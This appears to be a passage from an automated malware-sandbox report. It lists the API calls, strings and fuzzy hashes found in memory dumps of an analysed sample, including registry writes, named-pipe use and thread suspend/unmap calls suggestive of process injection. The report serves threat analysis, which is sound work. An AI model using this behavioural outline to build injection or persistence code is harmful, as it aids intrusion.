  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 25
  • API ID: HeapFreeRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionmemcpy
  • String ID:
  • API String ID: 229461383-0
  • Opcode ID: bbc3c6a859906d8649009038d034178e5739454c1ef541e28150f978055748ba
  • Instruction ID: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
  • Opcode Fuzzy Hash: EDE06870284402D5901B6489BC4AA32FA0BFA813CADCD411BDD613924D3AC305A57B18
  • Instruction Fuzzy Hash: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
  • memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001CAE7F: lstrcmpi.KERNEL32(?,001EC4EA), ref: 001CAED6
    • Part of subcall function 001CAE7F: HeapFree.KERNEL32(00000000,00000000,001C5C01), ref: 001CAF03
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: a7ba591b065612ca5392502f724a25a23db9ce2fa7cff4761a80896cec28b3f4
  • Instruction ID: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
  • Opcode Fuzzy Hash: 51D05B95471CC4D3595E459D102515290C66C6530619CF5467751397655B30305CEF6D
  • Instruction Fuzzy Hash: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
APIs
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetCurrentThreadId.KERNEL32(?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 01B34BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 01B34BD9
  • lstrcpy.KERNEL32(00000000), ref: 01B34BE0
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 3256001470-0
  • Opcode ID: 01f8e3d33e50ea4ec22d448b9311bf29d95033bd0f3209c1f4217f579a1e53db
  • Instruction ID: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
  • Opcode Fuzzy Hash: 40E0C2FA0244E39A502B6469683A2B8F6197C912D640D6232F6152D609BF8332A73B1E
  • Instruction Fuzzy Hash: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
  • wsprintfA.USER32 ref: 001CA775
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
APIs
Strings
  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 207
  • API ID: GetLastErrorRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 3795092134-0
  • Opcode ID: 9c0483735e420b961606bb44f790258f0624431ad703bd6a52c8d6e915669058
  • Instruction ID: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
  • Opcode Fuzzy Hash: 3DF0AC400B9F91EBE45376440492F59A247BB01FB6E0EE721A9F211BC23F02625D9B1A
  • Instruction Fuzzy Hash: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
APIs
  • memset.NTDLL ref: 001D894F
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 001D8A42
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
  • memcpy.NTDLL(00000218,001E3E62,00000100,?,00010003,00083097,?,00000318,00000008), ref: 001D89CA
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001D8A24
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 29
  • API ID: HeapFreeRegisterWaitForSingleObjectRtlAllocateHeapmemcpy
  • String ID:
  • API String ID: 1976740423-0
  • Opcode ID: 00e719380342739fce2d9a83077352ae1e8e636be9c83fb6a114a482fd48beda
  • Instruction ID: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
  • Opcode Fuzzy Hash: 8CF059B0118943C9E83B20D21991BBEAB423F935CBC0E4631E40308A4F1E4762B63A98
  • Instruction Fuzzy Hash: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C665D
  • memcpy.NTDLL(00000018,?,?), ref: 001C6686
  • RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_00005549,00000000,000000FF,00000008), ref: 001C66C5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C66D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 114
  • API ID: CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 3243309207-0
